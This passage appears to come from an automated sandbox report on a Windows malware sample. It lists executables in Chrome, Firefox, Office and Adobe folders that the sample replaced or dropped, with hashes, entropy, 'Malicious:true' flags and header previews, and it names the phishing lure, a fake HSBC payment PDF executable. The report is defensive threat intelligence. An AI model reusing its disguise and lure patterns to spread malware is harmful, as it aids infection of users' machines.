                                                                                                                                                                              SHA-256:530BB34F5EBBE09B809545F63745346AD6BE19C0EDCC49CC8608814E0817AE3A
                                                                                                                                                                              SHA-512:3CF02B38E148535D3DF608F290B225EEC221996B00774180247534166091F2A03B8AE20A7A5BB6ED065A6194712BB6CE19D93798DFE1188E3B3AB15578D76004
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....{.Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1468416
                                                                                                                                                                              Entropy (8bit):4.89007921484243
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:fXr/SVAxW8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DNxhLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:7C20F540564A8667850415588B5D432A
                                                                                                                                                                              SHA1:5C3C1F96DE284BE43B698241388C374D70554231
                                                                                                                                                                              SHA-256:1AF59598385EAC6A9CF720BF1DAD02B50F3933389CB1E631263C0C63A60EE0FD
                                                                                                                                                                              SHA-512:16779F5A8D736FA9FFBB296694D2C1EAB3A785F254AF1E9A58E74E7606B9DB70CA9D1FA6128669B15C7F55874F648D0FC11616049FA729B790E2BE44F8F493FF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!.................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):27533312
                                                                                                                                                                              Entropy (8bit):6.24804678699589
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:196608:ChRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyF9:ChRCpGpMJMrbp8JjpWdNlc5p9
                                                                                                                                                                              MD5:1194AA497581AF9F222AE2AD04B43218
                                                                                                                                                                              SHA1:B5715AE58FA2FEED267E232D608C0F84EE2341DB
                                                                                                                                                                              SHA-256:2BA67E9AC638FFAD09E04B860E2EA27A3060522BFA62A77BF94A7BE6F1A35FBE
                                                                                                                                                                              SHA-512:343950D2EFD4AF79A1605F2D2BC75A987BB76E095F1A430A378FBB61C3F45B6A7C12DDF2DAE3E1575E3E61AB4A98AD1B420F9921A601008A53865C448CC9A1F2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2199552
                                                                                                                                                                              Entropy (8bit):6.782210710834106
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:583pZ3kd0CuEeN0LUmRXbYs65m2LNiXicJFFRGNzj3:xKuUMY15d7wRGpj3
                                                                                                                                                                              MD5:31048E860DC4158496ACAB09EF1923D1
                                                                                                                                                                              SHA1:386E1FBDEC83E01ED966994ADB0B52654B93CF74
                                                                                                                                                                              SHA-256:5DFFDE9740C8992ABA13A58B1B910018B7EC05BFC5E917150CD1C52A9637EF89
                                                                                                                                                                              SHA-512:C7E71F36D85A9FC204284F5D685F9C57CDAA2AEE456C8F6495A73CD5301F3EBF3A9F2617D3BE04B3C740D165AFBB11E5841EF99441BAF19B0D5A351A00502407
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....jB"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4971008
                                                                                                                                                                              Entropy (8bit):6.668191967559824
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:dErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+MQ:LA4oGlcR+glpdOPKzgVZc7wRGpj3
                                                                                                                                                                              MD5:0CD489792626C63DAC9215CD3E01CD00
                                                                                                                                                                              SHA1:8C563F3FEFCC4743F49E06F57D4DE34A6E48946B
                                                                                                                                                                              SHA-256:48F6E11F22A63F7D9467402EA9E7B167622CC2B44A2B70D2D1EDE622433504F2
                                                                                                                                                                              SHA-512:930ECEFCFE2C6421DE4EA16DDB82356E9A954C3E495104544A3E8A1C031B5ACD4AEC825D04AB88DF239E240407D909AEFA10202AD77D1C2CC9E04B7F444A6454
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......jL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                              Entropy (8bit):6.827342709053817
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:Z8ErxqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:0v2gM+qwtLg7pPgw/DSZHG7wRGpj3
                                                                                                                                                                              MD5:C578CCC487248169B2D039EFEFCD029B
                                                                                                                                                                              SHA1:2EE92BA18666FCF9F811E4270F509811C4D3072E
                                                                                                                                                                              SHA-256:9C923107DE513269387D49761DB8812534FC4AB7DDFDB7CC4A3796B01906E796
                                                                                                                                                                              SHA-512:4373C90CC917D87CD40724988F4A6C92AD453E98D10E3AB1C02539259FC8260E3AEC0B13ACD5D8B69520D2DBE5F58B64548B650D8F24D41499C3BD31E6CAB789
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                              Entropy (8bit):6.827342866276559
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:b8ErxqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:av2gM+qwtLg7pPgw/DSZHG7wRGpj3
                                                                                                                                                                              MD5:05BE3F60C2A1C15C0C002768B4247B95
                                                                                                                                                                              SHA1:68C851C4F4B33D806CD36438FAA0BF62C2760948
                                                                                                                                                                              SHA-256:0A7E68FEB06C5DEC2512F74DCF16ECF8C1ACC31EA96B0566AC025F2AA2B78D5E
                                                                                                                                                                              SHA-512:162B27EE0093E08CCAEFBDC2B93D3E76892C04F82E4ADD4077827038018D0D19DEA41576078BC68917997E9450BF79C674F8218B3BE2C6C92BDFA54643A0DFF6
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2156544
                                                                                                                                                                              Entropy (8bit):6.9474953057981645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FtjqL8fHv8aUbp8D/8+xyWAV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:HjKKv81FI/8zDLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:511DA813147FD4D5B61029F752DEBFA6
                                                                                                                                                                              SHA1:D5E045F3DA49C97A7185390B2B70BE1334A3B551
                                                                                                                                                                              SHA-256:29AEC565246A0082015A4AC749E246FA795CFA30AD5E202AC8F3A1F180D64351
                                                                                                                                                                              SHA-512:4B4F7DD669822AFFB28860EE224CEAF0B7DB1A0C40C93A6C6D420A231DA1F4846E754CE3EF768B9A47586F1A5CA713AC4F056CDD1544D331788AA2915C5FF404
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......D!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2370560
                                                                                                                                                                              Entropy (8bit):7.027348462105408
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:2AMsOu3JfCIGcZuTodRFYKBrFDbWpeLNiXicJFFRGNzj3:2AMa3PZuTS37wRGpj3
                                                                                                                                                                              MD5:67C322900C5D783BD07C9844D6B508F0
                                                                                                                                                                              SHA1:4B92B8F908168FF8C039DB29EF5600AD38EC681A
                                                                                                                                                                              SHA-256:F2E1ED761AFEA50D820364FDC17D4B1ECD222097B572587116622BCD313CD091
                                                                                                                                                                              SHA-512:BD416F3431A2519F848865167777729A52741666E2D8BA3AFE74807B7E8AD75915452F8DDFA8517544A2C96570359F1FCC517F1908B1598DB76D44CA6C6FC1FF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1984512
                                                                                                                                                                              Entropy (8bit):7.098273000165978
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:pSK7Fhsly2EPfOGE4LNiXicJFFRGNzj3:YU2cO47wRGpj3
                                                                                                                                                                              MD5:C99C88D2120E1E9B20A95062A487E70D
                                                                                                                                                                              SHA1:E3BE527F5DE6C80821E7CEBF6C11F340A2834482
                                                                                                                                                                              SHA-256:5C76453B4B50E56BAEDBFF5609CC869F816EBBF3025D78319151EB91BAC39642
                                                                                                                                                                              SHA-512:E8965D784B834374CF4FE5FDA396BD47D5B883205AEBCD4BEE2DD23110C5B9BFBDCF885E5918EFA4D2C9A4300DCB2E934C75CD8A0BF993D437542C28920EAD88
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................A..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1779712
                                                                                                                                                                              Entropy (8bit):7.151347051638003
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:Nv7e0j11mD+/wDGbqLNiXicJFFRGNzj3:BDx1mkq7wRGpj3
                                                                                                                                                                              MD5:03D2676A6F61D30E364B35077AC90872
                                                                                                                                                                              SHA1:962031BA2E2B83A8DE13C98FD6F1E9D45104BE7D
                                                                                                                                                                              SHA-256:5E8B61CB31CF9718F336D06AD202DD009FD422E95517F5C9CAE8974A0DF090F7
                                                                                                                                                                              SHA-512:E2B3745FB5BD12AB3B722CC3C2A7559E7709685DA5FDC456518CDBD402FE979893A7043553E5E618BED768037B774AD183844ED523F9761F67F8DB71997A7048
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1533952
                                                                                                                                                                              Entropy (8bit):4.933085425137115
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:BKhS2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:B8LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:50675C06B78688820F85A9F584519632
                                                                                                                                                                              SHA1:FC730A028F089FBE706B47043FA39B5BAD3D1633
                                                                                                                                                                              SHA-256:4D2A1C5940071E8CCF502C560B3F50BB98E0BD2BA30DC06655D9A9ADB682D08B
                                                                                                                                                                              SHA-512:157B4F90A2E4F31EBCBAE0805B10304530DBD83582C1826F27622BFDFD54454587645C8AA3F38F605231943888E72FBDB84BBE80BAB454BC7FDB62D9620F6140
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@..............................".....D..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1286656
                                                                                                                                                                              Entropy (8bit):7.213925180585707
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:usFfc1VyFnTUQn652bO4HJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:usFcInTrJfLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:8A4EA576196A6EE617A986831EAEF815
                                                                                                                                                                              SHA1:F45E5CBA64797E654BDD16451970FBE75EDB8A59
                                                                                                                                                                              SHA-256:78C6B8DC90E6171E2C10D2259C7508DC71D55881CB7EE6BCD65178E038A70AC0
                                                                                                                                                                              SHA-512:424ECAB9870960C6CD15FFE95D46F9D478F0B778376659A84D1A10405332FB56F3703DF5D118E0A39F470958F41C5D338EFA1E8584478A95FB8A561F6896BF55
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.....................................K.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1246208
                                                                                                                                                                              Entropy (8bit):7.485578003142355
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Vt9j6p4xQbiKI69wpemIwpel9C/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Vt9+aQbtl2peapelwLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:C6336676C3E6C992DBAFE0E3ED7DC516
                                                                                                                                                                              SHA1:7E528473F7C6C422B23574295D5EC870FCB129AD
                                                                                                                                                                              SHA-256:D0FE0093386950A96244C15D0B0F566EB4678B35D7AC2A6E6D5573FF0BDDC677
                                                                                                                                                                              SHA-512:C05776750B1C03974438C25492201E7D50E16239F4CD09158DA42548720E1F98C31D187313F87F79F0A0470B76D42B36724C9974827386617FA85E2E4E39079D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1512448
                                                                                                                                                                              Entropy (8bit):4.897886111511821
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:QQVTZu0Jh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vVTZuALNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2EE59823DD833777D9445FCF955CF469
                                                                                                                                                                              SHA1:236325100CF38AE7A2043572E08C7BB58FB40A98
                                                                                                                                                                              SHA-256:834B8CF02287C49F1D7C40C4EAD7779C29140E8E650198E4695F3020FB6A98AC
                                                                                                                                                                              SHA-512:48EC9C4D50126E6EA7BDE73B82837179D89692F9AA3B9B6A24CC22A410BA89AD4514DFCC810FC5012E26F8D6AB2179D2591BEC081D196490B1E4A7E1FBC1D203
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"......$.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1344000
                                                                                                                                                                              Entropy (8bit):6.798378998671327
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:XC1vpgXcZ/zv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XC1vpIc9vLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2575A6071E7B2F217D3CCC777C8DEA64
                                                                                                                                                                              SHA1:76782370B6C2EF1990B1BC26586DAD87E2E573B7
                                                                                                                                                                              SHA-256:AC44FCD5473A2927B826504B6DA4B50D19EA769E83A78EDFE41B697B86D30AF6
                                                                                                                                                                              SHA-512:94BE254F1EBE6AA87C82B8763E7D0570921C3780FAC0226B903813C86F6921942DB48B718A0FCF05EB34BA8E7314468EEA7CB85807FB167D8F48FE790B1459E0
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1355776
                                                                                                                                                                              Entropy (8bit):4.6511426773040885
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:/S7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2A372B8E403400EAA151AF673EFE0ADC
                                                                                                                                                                              SHA1:664D95837ECAE1F2291E12238456D68099972159
                                                                                                                                                                              SHA-256:7884AA219D1465C1C4016438348154CF793F89BB0925ECE33FC6C7034B3C2F9D
                                                                                                                                                                              SHA-512:26509D1E4E06C378767E7043CF036018B97FE2CD92371A45A8F2A43DE4533171ED549574DCF28D9F551D61D42681C16DE956CFFBAB5B35C5B588B25781C2EE3C
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................z..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1564160
                                                                                                                                                                              Entropy (8bit):5.002299084189597
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:fWDntIfGpR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eZIe3LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:6F6DF32E22BE5DB805863842BDD15A64
                                                                                                                                                                              SHA1:723904FECBCA2EABE799D2775082004AAB3FAE7D
                                                                                                                                                                              SHA-256:FF24D36E5A88F22BFD69CEB19D299534B930B7BD2B5B5068285E75188B1D7B2B
                                                                                                                                                                              SHA-512:66B31EEBFD06B54AA8858B221339D85048854E650FE07402E3D1DA38C671A0F60B7DC034C93D337FF469DFF81BAED75989B322F3A3DA51EECB6C257C9A87870D
                                                                                                                                                                              Malicious:true
